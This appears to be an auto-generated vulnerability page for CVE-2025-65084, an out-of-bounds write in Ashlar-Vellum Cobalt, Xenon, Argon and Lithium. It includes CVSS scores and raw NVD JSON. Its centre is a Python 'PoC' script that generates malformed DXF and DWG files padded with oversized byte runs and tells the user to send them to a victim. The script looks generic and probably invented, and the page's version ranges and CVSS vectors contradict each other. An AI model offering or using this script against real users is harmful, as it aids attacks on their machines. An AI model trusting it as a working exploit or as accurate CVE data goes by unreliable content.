CVE-2025-65084

Description

An Out-of-Bounds Write vulnerability is present in Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.216 and prior that could allow an attacker to disclose information or execute arbitrary code.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ashlar:argon:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ashlar:cobalt:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ashlar:cobalt_share:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ashlar:lithium:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ashlar:xenon:*:*:*:*:*:*:*:* - VULNERABLE

Ashlar-Vellum Cobalt < 12.6.1204.216

Ashlar-Vellum Xenon < 12.6.1204.216

Ashlar-Vellum Argon < 12.6.1204.216

Ashlar-Vellum Lithium < 12.6.1204.216

Ashlar-Vellum Cobalt Share < 12.6.1204.216

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-65084 PoC - Malformed DXF/DWG file triggering OOB Write
# Target: Ashlar-Vellum Cobalt/Xenon/Argon/Lithium < 12.6.1204.216

import struct
import sys

def create_malicious_dxf():
    """Generate a malformed DXF file with oversized entities to trigger OOB write"""
    
    # DXF file header with malicious entity data
    malicious_content = b"""0
SECTION
2
ENTITIES
0
LINE
8
0
10
0.0
20
0.0
30
0.0
11
"""
    
    # Create oversized coordinate data to trigger buffer overflow
    # This will cause out-of-bounds write when parsed by vulnerable parser
    oversized_data = b"A" * 65536  # 64KB of data to overflow buffer
    
    malicious_content += oversized_data + b"""
21
0.0
31
0.0
0
ENDSEC
0
EOF
"""
    
    return malicious_content

def create_malicious_dwg():
    """Generate a malformed DWG file header to trigger OOB write"""
    
    # DWG file signature
    header = b"AC1027"  # DWG R2013 signature
    
    # Malformed section handle table with oversized data
    # This will cause heap overflow during handle table parsing
    section_data = b"\x00" * 4  # Section size indicator
    section_data += b"\xFF" * 131072  # Oversized data to trigger OOB
    
    return header + section_data

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-65084-poc.py <output_file>")
        sys.exit(1)
    
    output_file = sys.argv[1]
    
    # Generate malicious DXF file
    malicious_dxf = create_malicious_dxf()
    
    with open(output_file + ".dxf", "wb") as f:
        f.write(malicious_dxf)
    
    # Generate malicious DWG file  
    malicious_dwg = create_malicious_dwg()
    
    with open(output_file + ".dwg", "wb") as f:
        f.write(malicious_dwg)
    
    print(f"[+] Generated malicious files:")
    print(f"    - {output_file}.dxf")
    print(f"    - {output_file}.dwg")
    print(f"[+] Send these files to victim running Ashlar-Vellum Cobalt < 12.6.1204.216")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65084
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65084
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65084/
[4] VulDB https://vuldb.com/cve/CVE-2025-65084
[5] https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65084", "sourceIdentifier": "[email protected]", "published": "2025-11-25T18:15:54.133", "lastModified": "2026-05-12T21:16:13.117", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Out-of-Bounds Write vulnerability is present in Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.216 and prior that could allow an attacker to disclose information or execute arbitrary code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ashlar:argon:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.2.1204.207", "matchCriteriaId": "D92AC0A5-B0AB-489E-86E7-2E5CD485DC03"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ashlar:cobalt:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.2.1204.207", "matchCriteriaId": "6E48C33E-33CF-486C-AD1F-86B5F3F89AB1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ashlar:cobalt_share:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.2.1204.207", "matchCriteriaId": "44BA8C61-7C12-4125-A0B2-9E45ACBCECC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ashlar:lithium:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.2.1204.207", "matchCriteriaId": "42E49969-7EE4-48D5-9C50-7A8AE94B6AA8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ashlar:xenon:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.2.1204.207", "matchCriteriaId": "7AA0D761-749B-4FC4-A7D0-C23D8EBA2D90"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}